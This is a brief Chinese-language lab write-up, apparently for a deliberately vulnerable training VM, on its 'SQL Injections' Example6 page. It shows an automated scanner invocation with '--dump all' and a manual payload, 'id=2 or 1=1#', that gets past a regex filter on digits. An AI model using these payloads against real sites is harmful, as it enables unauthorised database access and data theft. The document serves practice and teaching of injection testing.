我们打开靶机,选择“SQL Injections”
选择“Example6”
观察页面
我们使用工具测试
参数为
-u "http://192.168.29.148/sqli/example6.php?id=2" --dump all
开始测试
没有发现
我们使用手工注入
我们发现是数字
http://192.168.20.157/sqli/example6.php?id=1
于是我们payload为
http://192.168.20.157/sqli/example6.php?id=2%20or%201=1%23123123
结果
我们打开靶机,分析源代码
我们发现是跟exp5一样,只是使用正则规则过滤一些数字和$符号